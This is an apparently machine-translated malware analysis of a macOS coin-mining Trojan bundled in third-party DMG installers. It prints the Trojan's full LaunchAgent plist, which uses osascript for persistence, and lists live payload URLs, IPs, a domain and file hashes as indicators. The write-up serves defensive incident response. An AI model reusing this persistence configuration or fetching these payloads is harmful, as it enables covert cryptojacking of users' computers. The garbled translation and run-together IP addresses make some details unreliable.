Background
Recently in the emergency found a Mac on the mining Trojan, the goal is to dig the door, after the visit, the victim users have to install a third-party DMG from the Apple Computer experience (which can be determined a LOL Mac install app will cause the Trojan), Suspected that many third-party DMG on the Internet are carrying related malicious programs.
Phenomenon
According to the user reflects the user generally have the following several symptoms:
- High CPU Share
- System Card Dayton
- Activity Monitor won't open.
- Computer overheating
Trojan infection
After a brief analysis, suspected that the Trojan originated in the third-party installation package, during the decompression installation process, generated a disguised as 11.png (name can be changed) malicious files and com.apple.Yahoo.plist (~/library/launchagents/directory) Files and com.apple.Google.plist (~/library/launchagents/directory) files
- Com.apple.Google.plist (Startup item configuration) file as follows, it directs Com.apple.Yahoo.plist to execute
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"><plist version="1.0"><dict> <key>Label</key> <string>com.apple.Google</string> <key>Program</key> <string>/usr/bin/osascript</string> <key>ProgramArguments</key> <array> <string>osascript</string> <string>-e</string> <string>do shell script "osascript ~/Library/LaunchAgents/com.apple.Yahoo.plist"</string> </array> <key>RunAtLoad</key> <true/> <key>StartInterval</key> <integer>31104000</integer> <key>WatchPaths</key> <array/></dict></plist>
Start
Find an additional PNG file that is certified to run with the 11.png effect consistent with that Trojan's AppleScript file.
After the file runs, it will go to ondayon.com:8080 to download the following malicious files
Path: Under ~/library/safari directory
- Ssl.plist (Mining procedure)
- Pools.txt
- Cpu.txt
- Config.txt
[email protected] 1 xxxxxx staff 788212 8 17 16:08 ssl.plist[email protected] 1 xxxxxx staff 343 8 17 16:08 config.txt[email protected] 1 xxxxxx staff 229 8 17 16:08 pools.txt[email protected] 1 xxxxxx staff 256 8 17 16:08 cpu.txt
And in the corresponding ~/library/safari/openssl/lib/directory
Libcrypto.1.0.0.dylib
Libssl.1.0.0.dylib
[email protected] 4 xxxxxx staff 128 5 30 16:51 .[email protected] 3 xxxxxx staff 96 5 30 16:51 ..[email protected] 1 xxxxxx staff 385152 9 29 2017 libssl.1.0.0.dylib[email protected] 1 xxxxxx staff 1767648 9 29 2017 libcrypto.1.0.0.dylib
Digging mine
Ssl.plist is the xmr of the post-compilation mining from the program, mainly for mining.
Emergency Repair
43.294.204.18345.195.146.32101.55.20.149
# Domain
ondayon.com
Url
http://ondayon.com:8080/ssl.ziphttp://101.55.20.149/ssl.ziphttp://101.55.20.149/gogoto.pnghttp://101.55.20.149/8/Build.zip
Hash
0659b79c1b1274dc1e708cae010c9a2e778a3a52a476262015a788082b22a697(ibcrypto.1.0.0.dylib)fde413f8f369c2ede2f0f82e0ab7fe35eb6d4c770d73a6a58ad52fd9ddd65804(ssl.plist)c60e197f216fe29f1a9d0b80d0381fcebefe04b6f4d68db3255b6a002f0018c3(libssl.1.0.0.dylib)f89205a8091584e1215cf33854ad764939008004a688b7e530b085e3230effce(ondayon.png) 5619d101a7e554c4771935eb5d992b1a686d4f80a2740e8a8bb05b03a0d6dc2b(Install-LOL.app.zip)2b566d454faabb38cd5b173f9365b89bda5e88d4bfaa7dea97512cc9d89e9150(Build.zip)6e340b9cffb37a989ca544e6bb780a2c78901d3fb33738768511a30617afa01d(x.x)ab4596d3f8347d447051eb4e4075e04c37ce161514b4ce3fae91010aac7ae97f(com.apple.Yahoo.plist)2eb531d2d00c783fb83da9e925177a6aa3f567dec7f678cbe6c30f9dfd5111e7(com.apple.Google.plist)
Mac next door A brief analysis of the coin-mining Trojan